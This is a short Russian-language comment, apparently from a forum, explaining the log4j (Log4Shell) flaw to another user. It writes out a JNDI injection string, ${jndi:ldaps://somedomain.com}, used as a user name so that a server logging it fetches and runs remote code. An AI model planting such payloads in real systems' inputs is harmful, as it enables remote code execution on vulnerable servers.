Ты что-то не то читаешь. Суть уязвимости с log4j была в том, что ты пишешь в программе logger.info("User {} logged in", user.name);. Пользователь регистрируется со специальным именем ${jndi:ldaps://somedomain.com} и твой сервер загружает и выполняет определённый код с somedomain.com.

Наверное ты про какие-то другие уязвимости читаешь, менее важные. Там как начали в него пристально глядеть, много повылазило.